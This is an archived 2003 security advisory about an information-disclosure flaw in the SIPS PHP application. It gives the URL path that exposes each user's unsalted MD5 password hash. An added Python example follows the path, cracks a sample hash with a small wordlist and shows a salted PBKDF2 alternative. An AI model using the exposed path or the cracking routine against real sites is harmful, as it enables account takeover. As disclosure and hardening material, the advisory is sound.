SIPS (PHP)

From: subj (r2subj3ctat_private)
Date: Mon Mar 17 2003 - 16:59:47 PST


    
    Product : SIPS
    Version : v0.2.2
    WebSite : http://www.squishdot.org
    Problem : Viewing users account
    
    Description:
    ------------
    
     You can easily read any user's account data without any permissions. Each
    account is kept in a directory named after the first letter of the login.
    For example, user foo will have a URL like this one:
    /sipssys/users/f/foo/user
    So the user's info file can be viewed directly. It gives you the MD5 hash of
    the password (unsalted, as the login.php excerpt shows), which you can then
    try to crack offline with John the Ripper or any other such tool.
    
     E.g:
      
      http://localhost/sips/sipssys/users/t/test/user
         
      Password::47bce5c74f589f4867dbd57e9ca9f808  // the password, hashed with the MD5 algorithm
      Email::test@localhost
      Theme::default 
    
    ==========
    login.php:
    ==========
    [...]
    
    if ($action == "login") {
          if ($username) {
             // the user file lives at <sipssys>/users/<first letter of login>/<login>/user,
             // the same path that is reachable over HTTP when sipssys sits under the web root
             if (file_exists($config["sipssys"] . "/users/$username[0]/$username/user")) {
                // unsalted MD5 of the submitted password ...
                $cryptpass = md5($password);
                // ... compared with the "Password::" value read from that same file
                if (getUserValue($username, "Password") == $cryptpass) {
                   $cryptuser = "$username:$cryptpass";
    [...]
    
    
    Exploit:
    --------
    
    http://[somehost]/[sips_directory]/sipssys/users/[first_letter_of_UserID]/[UserID]/user
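
    The following is an added example, not code from the advisory or from SIPS. It
    reproduces what the advisory describes end to end: it builds the same
    users/<first letter>/<login>/user path that login.php uses, parses the
    Key::Value lines of a user file (a constructed copy of the sample above), runs
    the same unsalted-MD5 comparison that login.php does, and then performs the
    offline dictionary attack that JtR would perform against the exposed hash. The
    wordlist is constructed; the hash in the advisory's sample file turns out to be
    the MD5 of "aaa", which the attack recovers. The hardened_hash/hardened_check
    pair at the end is an assumption about how such a check should look (salted,
    iterated, constant-time compare), not a SIPS fix.

```python
import hashlib
import hmac
import os
from typing import Dict, Optional

# Constructed copy of the user file shown in the advisory (Key::Value format).
SAMPLE_USER_FILE = """Password::47bce5c74f589f4867dbd57e9ca9f808
Email::test@localhost
Theme::default
"""

# Constructed wordlist standing in for a JtR / hashcat dictionary.
WORDLIST = ["password", "test", "123456", "aaa", "letmein"]


def user_file_path(sipssys: str, username: str) -> str:
    """Mirror login.php's path: <sipssys>/users/<first letter>/<login>/user.
    When sipssys sits under the web root, the same path is a URL."""
    if not username:
        raise ValueError("empty username")
    return f"{sipssys}/users/{username[0]}/{username}/user"


def parse_user_file(text: str) -> Dict[str, str]:
    """Parse the Key::Value lines of a SIPS user file into a dict."""
    values: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or "::" not in line:
            continue  # skip blank or malformed lines
        key, _, value = line.partition("::")
        values[key.strip()] = value.strip()
    return values


def sips_login_check(user_values: Dict[str, str], password: str) -> bool:
    """The check in login.php: unsalted md5(password) == stored Password value."""
    return hashlib.md5(password.encode()).hexdigest() == user_values.get("Password")


def crack_md5(stored_hash: str, wordlist) -> Optional[str]:
    """Offline dictionary attack: exactly what JtR does with --format=raw-md5.
    No salt means one MD5 per candidate, reusable against every user file."""
    target = stored_hash.lower()
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == target:
            return candidate
    return None


# Hardened form (assumption, not SIPS code): per-user salt, iterated PBKDF2,
# and a constant-time comparison. Even if the file leaks, each hash must be
# attacked separately and each guess costs `iterations` HMAC calls.
def hardened_hash(password: str, salt: bytes = None, iterations: int = 200_000) -> str:
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def hardened_check(stored: str, password: str) -> bool:
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print("would fetch:", user_file_path("/sips/sipssys", "test"))
    values = parse_user_file(SAMPLE_USER_FILE)
    found = crack_md5(values["Password"], WORDLIST)
    print("cracked password:", found)
    print("login.php would accept it:", sips_login_check(values, found))
    stored = hardened_hash(found)
    print("hardened record:", stored)
    print("hardened check:", hardened_check(stored, found))
```

    Running it prints the URL an attacker would request, recovers "aaa" from the
    sample hash, and shows login.php accepting that password; the hardened record
    differs on every run because of the random salt, so a leaked file no longer
    gives a cross-user crackable table.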
    
    
    Link:
    =====
    www.dwcgr0up.com
    irc.dwcgr0up.biz:6667
    
    Fixs:
    =====
    
    You can find all our fixes on our homepage [www.dwcgroup.com]
    
    Thanks:
    =======
    GipsHack crew : DHGroup etc etc
    



    This archive was generated by hypermail 2b30 : Tue Mar 18 2003 - 16:27:33 PST